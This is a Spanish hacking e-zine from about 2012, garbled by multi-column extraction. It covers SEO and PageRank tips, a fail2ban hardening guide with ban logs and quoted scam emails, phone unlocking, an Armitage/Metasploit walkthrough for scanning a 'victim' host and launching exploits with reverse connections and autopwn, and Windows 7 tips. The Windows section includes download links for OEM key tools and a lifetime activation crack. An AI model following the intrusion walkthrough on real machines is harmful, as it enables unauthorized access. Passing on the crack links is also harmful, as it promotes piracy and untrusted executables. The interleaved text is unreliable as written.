bastante complejo, pero muy efectivo. (Aunque ?ltimamente 4/10 o 5/10. Para lograr aumentar el page rank de tu p?gina, aqu? van
comience a ir como un culo). Ese c?lculo de google se encarga, en algunos consejos imprescindibles:
parte, de valorar la calidad o importancia de una pagina. Google de
hecho tiene mogoll?n de bots navegando por Internet 1 Tener el c?digo de tu pagina, limpio y ordenado,( A Google le
continuamente en busca de p?ginas nuevas y actualizaciones de molan las cosas bien hechas y valorar? la calidad del c?digo). Pod?is
antiguas. Antes a estos estos bots se les llama googlebot y freshbot, validar vuestras paginas aqu?. De hecho el codigo limpio y ordenado
el primero indexaba paginas el segundo se encargaba de no ayuda directamente a subir el Page Rank, pero si que mejora
actualizarlas. mucho el posicionamiento de las paginas, osea que es una una manera
de aprovechar al maximo nuestro page rank.
Ahora ya no existen. Parece ser que Google utiliza ya un rango de
bots con IP 64.68.82.* que sirven para indexar p?ginas nuevas y 2 Que te "Linken" desde p?ginas que tengan un Page Rank alto. Tal y
tambi?n para meterlas de forma fija en el indice. Una vez que como los enlaces de p?ginas con Page Rank inferior o igual a 3/10

20 SeNeGe
apenas cuentan para aumentar el Page Rank (aunque si cuentan).
Desde aqu? podeis descargar un pdf en ingles que trata el tema del
Cualquiera con un Page Rank superior o igual a 4/10 har? que sumes
Pag Rank profundamente. Algunos consejos a recordar para
muchos puntos en google. (?l es as? de chulo).
mejorar el Page Rank y el posicionamiento de busqueda.

3 Indexar tu pagina en DMOZ!!!! important?simo, Dmoz es el


Tener el codigo de la p?gina y las hojas de estilo validadas es
directorio en el que google basa sus b?squedas, una vez a?adido tu
muy util. En primer lugar por que tener el codigo ordenado, nos
Blog all?, pasara a ser un Blog "Oficial". ?No esperes m?s a
permite trabajar la p?gina y efectuar los cambios de una manera
a?adirlo!
much mas comoda. Adem?s siempre es un orgullo tener un codigo
limpio, como recompensa a un trabajo bien hecho, es como si te
Estos son los 3 puntos mas importantes para mejorar el Page Rank
pusiesen un 10 haciendo los deberes.
en Google,tambi?n son importantes las metas que le pongas a tu
Pero sobre todo tener un codigo validado es importante por que
pagina y las palabras clave que uses.
Google lo bonifica con el posicionamiento de busqueda

"Entre p?ginas que se enlazan hay mucho trapicheo con esto del
El que esteis a?adidos en DMOZ. En serio que es super
page rank, por que claro las p?ginas con el Page Rank mas alto
importante, por que adem?s de mejorar los resultados de vuestra
pueden ayudar mucho a una p?gina nueva por ejemplo. Por eso es
busqueda, permitira que google os de sirmpre preferencia es como
importante lograr tener un enlace en esas p?ginas, o en los
si estuvieseis "registrados" y fueseis sus ni?os bonitos.
directorios donde se adecue la tuya, ya que tambi?n suelen tener un
Page Rank importante"
A?adir vuestras a directorios y buscadores donde tengan cabida,
pues normalmente esos links llegan con un Page Rank alto.
Cuando alguien ponga en Google la palabra "Coche" por ejemplo,
Google lo que hace es buscar:
Jugar con las metas en vuestras paginas, a Google le gusta un
trabajo bien hecho y explicito, por ejemplo esto seria un buen
Primero las webs que tengan la palabra en el dominio mismo, osea
encabezado, que no el mejor. (Mi p?gina) , aunque google
en la url www.coche.com por ejemplo, o
acostumbra a pasar de todo, son datos que os ayudaran a mejorar el
http://www.paginaweb/coche.
posicionamiento, y ademas sera util para otros buscadores que
lleguen a vuestras p?ginas
Luego las que tengan la palabra coche en su titulo
Cdigo:
Cdigo:
<Title>Coche</Title>
.<!DOCTYPE html PUBLIC "//W3C//DTD XHTML 1.0
Y por ultimo aquellas que en el cuerpo de la pagina este escrita la
Transitional//EN"
palabra coche. Y es aqui donde influye el page rank, si es un tio con
"http://www.w3.org/TR/xhtml1/DTD/xhtml1transitional.dtd">
un page rank 8/10 el que ha escrito por ejemplo "ayer me compre un
coche" con ese pedazo page rank va a salir en las primeras
busquedas, aunque la palabra coche sea tan comun.
Cdigo:
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="esES"
Si es un tio con page rank 3/10, pues en una palabra tan comun
lang="esES">
como coche, seguramente aparecer? en las ultimas paginas. Ahi esta
<head>
el detalle del Page Rank
<title>xxxxx Blog Web personal de xxxxx</title>
<meta name="description" content="xxxx" />
Una p?gina con un Page Rank bajo, puede aparecer en las primeras
<meta name="keywords" content="Bitacora, Blog, Blogs, Weblog,
posiciones de Google por tener una palabra clave en su url o en su
Weblogs, Web Personal" />
titulo. Pero claro las palabras que podemos meter en un title son
<meta name="author" content="xxx xxx xxx" />
limitadas, lo suyo es que sean las palabras del cuerpo de la pagina
<meta name="robots" content="all" />
las que aparezcan en buenas posiciones, por que esas son las que
<meta httpequiv="ContentType" content="text/html charset=iso
cuentan, las que se actualizan, y las que son un monton.
88591" />
<meta httpequiv="ContentLanguage" content="es" />
De todas las paginas que puedan tener en unenlace a la tuya, para
<meta name="copyright" content="tu nick" />
google cuentan las que tienen Page Rank 4/10 o superior. Las demas
<meta name="Replyto" content="tu mail" />
tambien cuentan pero su valor es menor, ademas aunque las ve no
<meta name="generator" content="tus herramientas" />
son tan importantes.

21
<base href="http://(vuestra url)/" /> archivo llamado robots.txt en cuyo contenido aparezca lo siguiente:
# robots.txt for el que lo quiera
Todo esto es un poco pijerio ya lo se, pero es util para google, si
estais interesados en que os trate bien y en aumentar las visitas a Cdigo:
vuestras p?ginas, lo tendreis que tener en cuenta. Useragent: *
Disallow: /admin/ # aqui las carpetas que querais que nadie vea
Calculando el Page Rank Recomendado: http://www.robotstxt.org/

Dado que el PageRank se traspasa entre p?ginas, mediante enlaces, ?Habeis visto el robots.txt de google alguna vez?
para calcular (siempre de forma aproximada) el PageRank total de http://www.google.com/robots.txt
una p?gina web habr? que saber el PR que recibe de cada uno de los
enlaces que apuntan a ella.
Cada documento web tiene la capacidad de repartir el 85% de sus
puntos de PR entre todos los enlaces que contenga. Esto quiere decir
que el PR que otorga un enlace se calcula como el PR de la p?gina
en cuesti?n, multiplicado por 0.85 y dividido entre el n?mero de
enlaces total que contenga. De forma orientativa, dado que es muy
probable que las puntuaciones hayan variado a lo largo del tiempo, la
tabla de correspondencia entre puntos de PR y rangos de PR (de 0 a
10) era la siguiente:

Cdigo:
PR1 = 0.00000001 hasta 5
PR2 = 6 hasta 25
PR3 = 25 hasta 125
PR4 = 126 hasta 625
.....
PR10 = 1953126 hasta infinito

Por ejemplo una p?gina de PR6 (supongamos 3200 puntos) con 20


enlaces traspasa 136 puntos de PR a cada una de las p?ginas a las
que apunta: 3200 x 0.85 / 20 = 136

Muchas veces es m?s beneficioso recibir PR de p?ginas con poca


puntuaci?n pero tambi?n pocos enlaces totales, que de una p?gina de
PR alto y muchos enlaces. Estos datos son utiles, pero son antiguos y
no todos los expertos los comparten, aun asi os pueden ayudar a
haceros una idea orientativa bastante importante. Fuente: Javi
forobuscadores.com

?Como reconocer a los bots de Google?

Si tienes acceso a los "logs" de tu servidor, puedes saber si el


Googlebot ha pasado por tu sitio y lo ha indexado. S?lo tienes que
buscar las ips de los bots. Los bots de google tienen un rango de ips
desde 64.68.82.*

Es importante tener en cuenta para que los buscadores trabajen bien,


y para que si lo deseais no indexen algunas p?ginas o carpetas
"secretas" que querais tener en vuestro servidor. Debeis crear un

22
FAIL2BAN
Como proteger servicios de ataques de fuerza bruta
los dos ultimos fines de semana tuve q a pesar de q son muy parecidas voy a
los spammers/scammers estan en la
sacar intrusos de servidores q explicar la instalacion tanto para
escala mas baja de la porqueria existente
administro, nada peligroso ya q los centos/redhat como para debian/ubuntu.
en internet, tanto desde el punto de vista
equipos estan actualizados y bastante para el 1ero tenemos q descargarlo
del usuario q recibe montones de correos
protegidos dentro de lo posible, pero desde:
q no le importan como del administrador q
siempre esta el problema de los
trata de hacer todo lo posible para
usuarios y el cuidado q le dan a sus http://sourceforge.net/projects/fail2ban/
minimizar el impacto en el buzon del
contraseas... en
usuario final.
ambos casos se lo extraemos con:
vieron comprometidas tar xvf fail2banx.x.x.tar.bz2
pero el peligro no esta
cuentas de los despues...
solo en parar la basura
mismos. en la 1era cd fail2banx.x.x
sino tambien en
lograron entrar x ssh python setup.py install
proteger nuestros
y correr un script q a continuacion lo agregamos al arranque
servers ya q son una
enviaba spam, en la del sistema copiando el siguiente
codiciada presa para
2da simplemente un login de correo archivo:
ellos, la oportunidad de hacer unos
con el mismo proposito pero enviando
cuantos billetes a costa de nuestro buen
una scam tipica, este era el texto: cp /files/redhatinitd /etc/init.d/fail2ban
nombre... je
chkconfig add fail2ban
Please be informed that you have chkconfig fail2ban on
asi tambien tenemos los miles de script
100,000 British Pounds Lodged in our service fail2ban start
kiddies q pasan el dia con sus programas
Western Union to transfer to you as
de fuerza bruta y sus diccionarios
winner of ECOWAS Lottery Jackpot. en debian/ubuntu lo podemos bajar de
probando combinaciones de user/pass y
los repositorios con:
algun ocasional hacker o aprendiz q puede
Please Contact:
ocasionar algo mas de trabajo. mas de
milton_daniel17@yahoo.com aptget install fail2ban (sudo en ubuntu)
uno se sorprenderia al ver los logs de un
server publico, al final de la entrada voy a
al entrar hizo un par de pruebas lo siguiente es configurar las "jails" para
pastear algunos para q vean el nivel de los
enviandose a direcciones propias q son los servicios q queremos proteger. para
ataques...
las siguientes: eso vamos a /etc/fail2ban y editamos el
archivo jail.conf haciendo una copia de
para detener este tipo de ataques
kenblast2003@yahoo.com seguridad antes por las dudas...
automatizados existe fail2ban, q es un
kenblastall@hotmail.com
software q en base a los logs del sistema
motide7@aol.com la configuracion puede variar un poco de
puede bannear IPs en base a intentos
una version a otra pero las opciones son
fallidos de logueo. a pesar de tenerlo
no fue lo suficientemente inteligente mas o menos las mismas siempre. en
instalado en la mayoria de los servers tuve
para borrar ni siquiera los correos q debian x ejemplo, las acciones, tiempos
q ponerlo en TODOS y ajustar la
enviaba, simplemente consiguio la de banneo, etc vienen definidas al
configuracion para q sea todavia mas
pass del usuario y me puso en cola 10 principio de manera gral o se pueden
agresiva. de paso aprovecho para hacer
millones de correos q se estuvieron personalizar despues en cada jail.
esta entrada para q vean q no es nada
enviando durante unas horas hasta q
dificil de instalar y configurar y ciertamente
me di cuenta. creo q penso q siendo lo primero es setear las redes e IPs
hace darse x vencido a la mayoria de los
domingo no lo veria hasta el lunes pero seguras, o sea las q queremos q el
intrusos.
x suerte suelo checkear logs bastante sistema no blockee nunca, como el
instalacion
seguido. rango de nuestra propia lan o

24 |_ocutus
direcciones de usuarios del sistema. esto se "actions" con el campo "banaction". paso a mi) de que el webmail corra en
hace modificando el campo "ignoreip", por un server mientras q el MTA esta en
ejemplo: en el action de centos vemos dos otro. en este caso nos vemos obligados
acciones, iptables y sendmail whois. la a agregar la IP del 1ero en la lista de
ignoreip = 127.0.0.1 192.168.0.0/24 1era crea una regla de iptables ignoradas del fail2ban del 2do para no
200.53.23.1 10.0.0.0/25 blockeando la IP y la 2da envia un bannear a todos los usuarios ya q la
correo con un whois de la misma al direccion de origen del logueo es
mas abajo tenemos los tiempos y situaciones destinatario configurado (root en este siempre la misma para todos.
del blockeo, q podemos dejar como estan o caso).
editarlas como queramos. son las siguientes: para solucionar esto podemos usar un
vamos a crear alguna jail mas x si no plugin escrito x matt rude, q se puede
bantime: es la cantidad de segundos q una IP quedo muy claro, postfix en centos: descargar desde aca:
es banneada (default 600). http://mattrude.com/projects/roundcube
findtime: un host es banneado si se loguea [postfixtcpwrapper] fail2banplugin/
erroneamente tantas veces como la cantidad enabled = true
en "maxretry" dentro del "findtime" (default filter = postfix hay q copiar el contenido dentro del
600seg). action
hostsdeny[file=/etc/hosts.deny]
= directorio de plugins de roundcube
maxretry: es el numero de intentos fallidos (ruta al archivo hosts.deny) (roundcube/plugins) y despues editar el
antes de ser blockeado. sendmail[name=Postfix, contenido del archivo main.inc.php q
dest=root] esta dentro del directorio "config",
pasamos ahora a configurar las jails logpath = /var/log/maillog agregando en la seccion de plugins la
(carceles). una de las mas usadas es la de bantime = 6000 siguiente linea:
ssh asi q empecemos x esa, vamos hasta
"[ssh]" y x default (en debian x lo menos) ya en debian: $rcmail_config['plugins'] =
la tenemos activada. sale mas o menos asi: [postfix] array('fail2ban')
enabled = true
[ssh] port = smtp,ssmtp con esto se crea un nuevo archivo
enabled = true filter = postfix llamado userlogins en la carpeta logs
port = ssh logpath = /var/log/mail.log conteniendo solo los intentos fallidos q
filter = sshd usamos para el fail2ban creando una
logpath = /var/log/auth.log y asi tenemos todo tipo de jails para ftp, nueva jail:
maxretry = 6 http y todos los servicios y la mayoria
de los ataques posibles. seria [roundcube]
y asi para centos: interminable y no tendria mucho sentido enabled = true
explicarlas una a una, simplemente port = http,https
[sshiptables] experimentando un poco se pueden filter = roundcube
enabled = true activar bastante facil. logpath =
filter = sshd roundcube /pathderouncube/logs/userlogins
action = iptables[name=SSH, port=ssh, roundcube es un cliente de webmail el eterno punto debil
protocol=tcp] relativamente nuevo (todavia esta en
sendmailwhois[name=SSH, beta) con muchisimas opciones y una obviamente esto no nos deja 100% a
dest=root, sender=fail2ban@fail2ban] interfaz q no tiene nada q envidiarle a salvo pero ayuda bastante, de todas
logpath = /var/log/secure ninguna otra. en mi humilde opinion es formas nunca es bueno confiarnos
maxretry = 6 muy superior al eterno squirrelmail q demasiado y mantener siempre los
parece casi prehistorico al darle una sistemas actualizados, los permisos
lo q mas nos interesa es q el enabled este en mirada a uno y el otro. bien configurados y los usuarios con las
"true" (activada) y el logpath q es la ruta del passwords mas complejas posibles...
log de seguridad del sistema, esta cambia de los logueos de correo pueden ser aunque siempre seran usuarios y
un sistema a otro como se puede ver. en blockeados con la jail "postfix" o el MTA siempre cabe la posibilidad de q hagan
debian vemos q falta el campo "action", eso q usemos como vimos antes, pero click donde no deben entregando sus
es xq viene definido antes en la seccion tambien se puede dar el caso (como me datos ante cualquier loteria de turquia o

25
una herencia del principe de liechtenstein...

... ese es el verdadero punto debil.


apendix

como habia prometido copio unas horas del log de fail2ban en un servidor de correo publico
(no muy grande) para q vean la cantidad de conexiones blockeadas. la mayoria son de
postfix pero hay alguna de ssh.

20120524 04:02:41,098 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.49.25.205


20120524 04:14:01,114 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
190.224.163.183
20120524 04:52:59,128 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
186.105.151.68
20120524 05:01:16,142 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
90.170.212.117
20120524 05:01:32,156 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
190.172.162.35
20120524 05:31:24,170 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
188.138.115.237
20120524 05:54:26,188 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.1.142.88
20120524 05:56:43,202 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
190.139.154.117
20120524 06:04:14,217 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
181.14.149.157
20120524 06:42:19,230 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
190.16.233.253
20120524 06:47:21,242 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
189.45.204.138
20120524 06:54:42,259 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 41.79.176.10
20120524 07:13:24,273 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 181.14.133.18
20120524 07:14:32,287 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
168.226.249.18
20120524 07:18:01,301 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
168.226.165.193
20120524 07:19:59,315 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
181.14.130.174
20120524 07:28:02,330 fail2ban.actions: WARNING [postfixtcpwrapper] Ban 190.31.98.41
20120524 08:02:34,618 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
181.14.150.101
20120524 08:03:04,633 fail2ban.actions: WARNING [postfixtcpwrapper] Ban
190.139.223.41
20120524 08:16:23,647 fail2ban.actions: WARNING

26
SERVICIO E-ZINE
Hola amigos en esta ocasin les traigo una
pequea investigacin de las personas que
reparan nuestros telfonos celulares.
Porque sobre ellos?
Por que como hoy en da la mayora de
nosotros andamos un telfono celular y a
uno que otro de nosotros se nos ha
estropeado, queremos liberarlo,
desbloquearlo, o simplemente queremos
actualizarlo.
Despus de tener las herramientas
Ahora veremos un proceso de cmo es que
necesarias, comenzamos con el proceso de
se libera un telfono Sony Ericsson E15
liberacin para nuestro telfono.
(Xperia X8).
Conectamos nuestro telfono a la Box con
Con herramientas profesionales y usadas
por un profesional.
En este caso usaremos una herramienta que
se llama Medusa Box, cable de servicio
para el modelo antes mencionado y su
respectivo software.

nuestro cable de servicio.


Lo conectamos con el software y le
damos clic en la opcin que nos dice
Unlock esperamos que termine el
proceso y listo telfono liberado.

Desconectamos y a disfrutar
nuestro telfono con cualquier
compaa.
Despus de tener las herramientas
necesarias, comenzamos con el proceso

28 nomo11
herramientas.
Ya ah viene el dicho:
Se cobra por lo que se
sabe, no por lo que se hace
Precio de tornillo a
cambiar $ 10 pesos, saber
que tornillo cambiar $ 100
pesos
Quieres un servicio
exprs?
Muy sencillo no? Crees Hay muchas personas que
que t lo puedes hacer quieren un servicio sper
solo adquiriendo las exprs, o por lo menos lo
herramientas? Crees quieren en menos de 30 si
que no hay ms detrs del no su servicio lo quieren
proceso? gratis.
En algunas ocasiones, se les
Bueno amigos perdn por otorga un servicio exprs,
expresarme as pero la pero tambin depende el
verdad hay muchas modelo de telfono, aunque
personas que no les hay veces nos parezca
parece el precio por el increble, un telfono
servicio que se les da y sencillo o muy bsico nos
piensan que aunque se puede llegar a costar ms
vea fcil y sencillo de caro liberarlo que lo que nos
hacer, es muy costo y puede tardar hasta 2
complicado, porque o 3 das en liberarlo.
podemos adquirir Por qu?
cualquier herramienta Por que el nivel de
para poder hacerlo seguridad es muy alto o
nosotros mismos, pero si nuevo que todava no hay
no sabemos cmo usar el dicha herramienta y sale
software, cmo usar el muy caro el cdigo de
cable, qu hacer cuando liberacin.
estemos haciendo todos Tambin, es el mismo caso
los pasos bien y el con las reparaciones fsicas,
software nos marque ya que puede ser que el
algn error desconocido, fabricante sea muy elevado
eso es por eso que se el costo de fabricacin del
cobra el servicio y producto y tambin es por
aunque hay veces no nos eso que hay veces que la
parezca el precio, las refaccin nos sale tambin
personas que lo hacen ms caro que el telfono.
son profesionales e Bueno amigos ahora ya
invierten en su tienen un idea de cundo
conocimiento y llevemos nuestro telfono a
servicio tcnico y no
andemos con berrinches por
qu no nos parece el trabajo
que nos van a realizar.

29
armitage
Entrando a un equipo
Primero que nada bienvenidos a esta host, en mi caso como la maquina es local
parte del articulo de la ezine en esta pondr la ip local, ahora si tu maquina es
parte veremos armitage que es una local pero son muchas maquinas y no
herramienta grafica para poder usar sabes Cul esta encendida? Cul tiene
metasploit. una vulnerabilidad? Puedes hacer otro tipo
de escaneo 192.168.x.x/24 le agregas el 24
Aca si te sale esa ventana le
Para utilizar armitage tenemos que y escanea todas las maquinas en red en
tener por lo menos java, metasploit este caso la ip seria desde el modem y las
actualizado, y armitage pcs
Puedes visitar su pagina oficial que Le doy en OK
contiene mucha informacin necesaria: Por ultimo termina el escaneo ahora me
http://www.fastandeasyhacking.com dice que use buscar ataques para poder
Bueno empecemos abriendo armitage ,
das en YES
ah! Por cierto, armitage lo puedes usar
Luego empezara a realizar su coneccion.
Windows,Linux y mac, en este caso
Ya luego estar listo armitage
utilizaremos backtrack que en este
Ahora lo primero que hacemos siempre para
mismo articulo puedes ver como se
poder identificar una maquina vulnerables
instala.
es hacerle footprinting o recoleccin de
datos sobre la maquina o victima, en este
explotar
caso analizaremos sus puertos aver cual es
Una cosa importante es que tengo
vulnerable e intentaremos acceder, aaah!
habilitado el firewall de mi pc, muchas
Otra cosa es que no solo acepta escaneos de
veces se lo puede brincar el firewall hay
nmap son tambin de:
muchos mtodos para poder hacerlo, pero
Acunetix, nessus,openvas,retina y otros mas
este tema no lo tocaremos
pero puse los que conozco por que son
Entonces tenemos un Windows :P que no
sabemos todava si es vulnerable, asi que
Abrimos el armitage. buscamos los ataques..

famosos en internet xD!


Host>Nmap Scan>Intense Scan
Nos tirara un mensaje como el siguiente:
Como ves all tenemos para escanear con
Dice que el anlisis de ataque se completo
nmap en este caso los puertos un escaneo
Lo siguiente solo seleccionamos el host en
Aqu puedes configurar el armitage para la esta caso un windows clic derecho y en la
coneccion, por ejemplo en host puedes parte de attack buscamos un posible
poner tu ip publica o tu ip privada, en port
el puerto que quieras y user y pass lo mismo
lo que tu quieras no es necesario tenerlo
configurado asi, pero en este ejemplo como
intenso:P
es un ejemplo practico lo veremos asi le
Luego te pide la ip a escanear puedes hacer
damos en connect
un simple ping para conseguir la ip de un

30 arthusu
ataque que pueda funcionar :D

Asi que intentaremos ese ataque Esto significa que esta


lanzando los exploits probando
Aqu nos sale lo que podemos cual funciona.
configurar
LHOST = local host nuestr ip local
LPORT = local port al que estaremos
escuchando o conectando
RHOST = ip publica o local de la
victima seria xD
RPORT = el puerto a atacar
Targets = es el tipo de sistema
operativo
Tambien podemos habilitar la opcin
use a reverse conection que puede ser
muy interesante. Ahora si la maquina no es vulnerable te saldr No
Por ultimo para lanzar el exploit le acitve sessions. En mi caso mi maquina no es
daremos en Launch vulnerable por que le meto a cada rato los parches
Ahora si el ataque no es exitoso como nuevos que van saliendo y tengo el sistema
esperabas puedes intentar mas exploits actualizado aunque sea XP XD!, ahora si lo
o puedes intentar usar la opcin de intentamos con una maquina vulnerable que pasa
autpwn de metasploit que va probando
exxploits y configurndolos
automticamente hasta ver si la
maquina es vulnerable para ello

Y listo una maquina en tu


posicin sistema operativo
haremos: Linux :D
Y saldr:
Saludos a todos! Dhackers
por siempre

Arthusu 2012

31
Trucos Windows 7
Desde que hay windows siempre tenemos para volver adescargar de nuevo es muy
5 Instalar Windows 7 con todos los pasos
formas de hacer diferentes trucos, ahora le tedioso entonces hay forma de hacer una
explicados
toca a Windows 7 el sistema operativo mas copia de seguridd de una manera muy
usadoo y actual en este momento, vamos a facil:
LA INSTALACION!
mostrar algunos truquitos para mejorar la
finalidad y saber mas a serca de este OS. Primero vamos a bontn de inicio de
1. Introducir el DVD de Windows 7
Windows y escribimos lo siguiente en el
2. Nos aparecer un texto como el
1 Cual es el mejor antivirus para cuadro de bsqueda:
siguiente Presione cualquier tecla para
Windows 7? C:\Users\Username\AppData\Local\Micros
arrancar desde el CD o DVD,
Pues hay muchos pero personalmente oft
presionamos cualquier tecla
recomiendo, Avast Antivirus Home Edition Cambia "C" por la unidad en la que tengas
3. Finalmente veremos la pantalla de
Y AVG antivirus Free. instalado tu Windows 7 y "username" por
presentacin de Windows 7, en donde nos
2 Como Bloquear la sesin de Windows 7 el usuario que tengas para iniciar sesion.
preguntaran el idioma y dems opciones.
desde un icono partiendo del escritorio.
Seleccionamos el espaol y luego
Para esto lo que vamos a hacer es crear un 4 optimizar el rendimiento de Windows7
terminamos de configurar la hora y el
icono de acceso directo al bloqueo del con discos SSD
teclado
ordenador hacemos los siguiente:
4. Hacemos clic en el botn Instalar
Hoy en dia Windows 7 tiene preparado
Ahora.
Clic con el botn derecho del ratn en el para detectar la instalacin de discos SSD,
5. A continuacin debers leer el contrato
escritorio y seleccionamos "nuevo". tras lo cual, automticamente deshabilita la
de licencia de Microsoft para luego aceptar
defragmentacin, pero es bueno asegurarse
los trminos de licencia. Por ultimo debes
Luego Seleccionamos "acceso directo". de ello, por lo que vamos a panel de
hacer clic en Siguiente.
control, herramientas administrativas y
6. En la siguiente pantalla tendrs dos
proseguimos a que nos pedir de introducir luego a Servicios, ah buscamos el servicio
opciones, la de actualizar el (Upgrade) y la
un campo de texto y escribimos esto : Defragmentador de Disco y lo
de la instalacin personalizada (custom).
rundll32.exe user32.dll,LockWorkStation deshabilitamos (sigue).
Hacemos clic en Personalizada.
7. Seleccionaremos cualquier particin que
entonces le damos a siguiente e El uso de discos SSD acelera los tiempos
tengamos disponible y haremos clic en
introducimos el nombre del acceso directo, de encendido y apagado del ordenador por
instalar. SI no tenemos formateado el disco
por ejemplo : bloquear PC lo que la opcin de hibernacin pierde
rgido, tendremos que hacer clic en
sentido.
Formatear para dejar sin archivos a esa
Y listo solo finalizamos y ya tenemos el Teniendo claro que no usaremos el modo
particin.
icono para bloquear el ordenador con un de hibernacin, deshabilitndolo te librars
simple doble clic encima. del archivo hiberfil.sys, el cual ocupa, en
8. Cuando hayas formateado la particin, te
mi caso 2,3 Gb y est en la raiz de la
ubicaras donde quieres instalar el Windows
Tambien podemos dejar el icono en el unidad donde tenemos instalado Windows
7 y le das clic en siguiente.
escritorio o anclarlo a la barra de tareas con 7. Para ver este archivo de sistema tendrs
lo que simplemente pincharemos una vez que ir a las opciones de carpeta y bsqueda
9 Una vez terminado el copiado de
con el ratn en el y la mquina bloquear y elegir "ver archivos y carpetas ocultos".
archivos, escribirs un nombre de usuario y
la sesin.
nombre de equipo si tu quieres. Click en
Para deshabilitar la hibernacin iremos a
siguiente
Inicio, escribiremos CMD, pulsaremos
3 Hacer copia de seguridad de nuestros Enter y en la ventana negra de DOS
10.En la siguiente pantalla nos preguntaran
gadgets de Windows 7 escribiremos powercfg h off y con ello la
una contrasea, la cual obviamente ser
hibernacin quedar deshabilitada y te
opcional y personal. Puedes dejar en
Es importanter siempre que tenemos librars de ese pesado archivo.
blanco estos campos si tu lo deseas. Clic en
muchos gadgets y no queremos perderlos

32 IPepe
siguiente.
Descarga de la herramienta: 1. diskpart
11. En esta ventana ingresaras el numero de
http://shareflare.net/download/87780.87e69 2. list disk
serie Windows 7, por ultimo le haces clic
6f1b46e45f2c331cf72baadcb21e/Hack_7_si 3. select disk 2 (hay que
en siguiente
npass.rar.html reemplazar el 2 con el nmero
12. En la siguiente pantalla seleccionamos
de disco en el que se detecte
Usar la configuracin recomendada
nuestra unidad USB)
13. Configuras tu zona horaria dependiendo
9 Instalar Windows 7 desde una llave 4. clean
donde te encuentres.
USB 5. create partition primary
14. En este paso deberes elegir la ubicacin
6. active
del equipo Casa (red domestica), Trabajo
No es dificil lo nico que tendremos que 7. format fs=fat32 quick
(red de trabajo), Cyber o dems (Red
tener en cuenta es el hecho de que ser 8. assign
Publica).
necesario contar con una llave de memoria 9. exit creamos la particin de
Finalmente has terminado con la instalacin
USB con la suficiente capacidad. La arranque en la llave USB
de Windows 7.
imagen ISO del DVD de Windows 7 Beta
6 Herramientas seleccionadas para tunear
debe ser descomprimida en un directorio Con la imagen ISO de Windows 7 Beta en
tu Windows 7
dentro de la unidad de almacenamiento, por 32 o 64 bits que hemos guardado

lo que necesitaremos 4 Gbytes de capacidad anteriormente en el disco duro,

como mnimo. Lo siguiente que tenemos simplemente tendremos que hacernos con
Para ver el video:
que hacer es comprobar que la BIOS del un programa capaz de extraer todos los
http://www.youtube.com/watch?feature=pla
ordenador donde vayamos a realizar la ficheros de esa imagen ISO. Uno de los
yer_embedded&v=Xac8kl_RZJQ
instalacin es compatible con el arranque ms populares y recomendados es

desde una unidad USB. Lo cierto es que es MagicISO.


7 Como activar tu Windows 7
lo ms probable si el PC cumple con los
requisitos mnimos para instalar Windows finalmente tendremos que elegir la
Con la heramienta Windows 7 OEM Key
7. imagen del disco de instalacin de
Ahora esta herramienta dispone de
Windows 7 y descomprimir todos sus
actualizacin de las Claves de producto y
Ahora vamos a preparar la llave para archivos a la llave USB. Luego
de los Certificados.
empezar tendremos que preparar la llave simplemente introduciremos la llave USB

USB, dndole el formato correcto y en el ordenador donde queramos instalar


Descarga: activando la particin que crearemos para Windows 7, estableceremos en la BIOS

almacenar luego los contenidos del DVD . que arranque desde USB y daremos
http://hotfile.com/dl/122904513/81751d8/
Para ello abrimos una consola de comandos comienzo a la instalacin.
Windows_7_OEM_Key_3.29.06.2011.exe.
escribiendo command en la opcin ejecutar
html
del men inicio y escribiremo uno detrs de
otro los siguientes comandos seguidos cada
http://www.fileserve.com/file/cdsfaqM
uno de la tecla enter:

https://rapidshare.com/files/891213057/Win
dows_7_OEM_Key_3.29.06.2011.exe

8 Crackear Windows 7 para toda la vida:

Ahora podemos Crackear windows 7


(32/64) para toda la vida, Solo abrir luego
ejecutar la aplicacin, darle a intalls,
esperar, darle a ok y se reinicia el pc, una
vez iniciado windows, ya tienes windows 7
original de por vida.

33
Conociendo mi PC
Qu es el Hardware? Software de aplicacin: Unidad central del
Aquel que permite a los usuarios llevar a sistema
El hardware se refiere a todos los cabo una o varias tareas especficas, en
componentes fsicos de las computadoras, cualquier campo de actividad susceptible
como lo de ser automatizado o asistido, con
son el disco dura, la grabadora de DVD, la especial nfasis en los negocios.
placa madre, el microprocesador, etc
Incluye entre otros:
Software Aplicaciones de Sistema de control y
automatizacin industrial ..
El software es una secuencia de _ Aplicaciones ofimticas
instrucciones, las cuales le dicen a los _ Software educativo
compones fsicos _ Software mdico Ni ms ni menos que la Unidad Central
cmo deben realizar una tarea en _ Software de Clculo Numrico del Sistema (System Unit en ingls) es el
particular. _ Software de Diseo Asistido (CAD) centro de operaciones de cualquier
Que es un Software de sistema: _ Software de Control Numrico (CAM) computadora.
Al abrir dicha unidad central del sistema
Su objetivo es desvincular adecuadamente Datos e Informacin (tambin denominado gabinete, chasis o
al usuario y al programador de los detalles
carcasa se pueden visualizar un conjunto
de la computadora en particular que se En informtica decimos que lo que de componentes:
use, aislndolo especialmente del ingresamos a la computadora son datos, Nos encontramos con componentes
procesamiento referido a las caractersticas los mismos son procesados y luego los como:
internas de: memoria, discos, puertos y resultados obtenidos de los datos de CPU o Unidad central de proceso
dispositivos de comunicaciones, entrada los denominaremos informacin Placa madre o motherboard
impresoras, pantallas, teclados, etc. El (es decir los datos ya procesados). Memoria principal
software de sistema le procura al usuario y
Fuente de alimentacin
programador adecuadas interfaces de alto Vamos a un ejemplo: Supongamos que Los buses
nivel, herramientas y utilidades de apoyo deseamos realizar una suma de dos Disco duro
